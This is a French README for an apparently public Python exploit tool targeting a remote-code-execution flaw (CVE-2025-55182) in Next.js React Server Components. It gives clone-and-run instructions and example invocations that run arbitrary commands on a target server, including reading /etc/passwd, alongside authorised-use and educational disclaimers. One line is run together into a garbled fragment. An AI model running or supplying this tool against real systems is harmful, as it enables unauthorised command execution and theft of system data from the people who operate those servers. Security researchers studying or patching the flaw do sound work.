
Un outil d'exploitation pour la vulnérabilité Next.js CVE-2025-55182 qui permet l'exécution de commandes à distance par empoisonnement du prototype dans les React Server Components.
Exploit Python pour la vulnérabilité RCE des composants serveur React de Next.js avec support HTTP/HTTPS.
# Clone & run
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<command>"
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"
# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"
Pour les tests de sécurité autorisés uniquement.
Utilisez uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite. Ne jamais utiliser pour des activités illégales.
child_process.execSync()Licence MIT - voir le fichier LICENSE
Avertissement: À des fins éducatives uniquement. Obtenez toujours une autorisation appropriée.
Dernière mise à jour: 8 février 2025
Version: 2.0.0
Mainteneur: BrianLopezM99